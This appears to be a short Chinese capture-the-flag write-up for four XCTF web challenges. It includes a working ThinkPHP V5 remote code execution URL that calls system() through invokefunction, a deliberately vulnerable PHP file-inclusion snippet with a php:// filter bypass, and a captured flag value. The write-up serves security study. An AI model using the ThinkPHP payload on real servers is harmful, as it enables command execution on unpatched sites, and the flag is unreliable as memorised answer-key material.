XCTF WEB 进阶区 001-004 WP
XCTF WEB 进阶区 001-004 WP
001.baby_web
打开主页index.php,会自动跳转回1.php直接抓包获得flag

002.Trining-WWW-Robots
直接查看robots.txt文件

再查看fl0g.php文件,获得 cyberpeace{6f67c47379852dd00c1075dcf584f269}
003.php_rce
网页提示ThinkPHP V5 直接百度相关漏洞
1.查找flag
[http://220.249.52.133:52341/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"](http://220.249.52.133:52341/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag")

2.查看flag

004.Web_php_include
代码审计
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
题目名字显而易见,文件包含。分析源码 php:// 被过滤了。Php://直接绕过

直接cat获取flag


浙公网安备 33010602011771号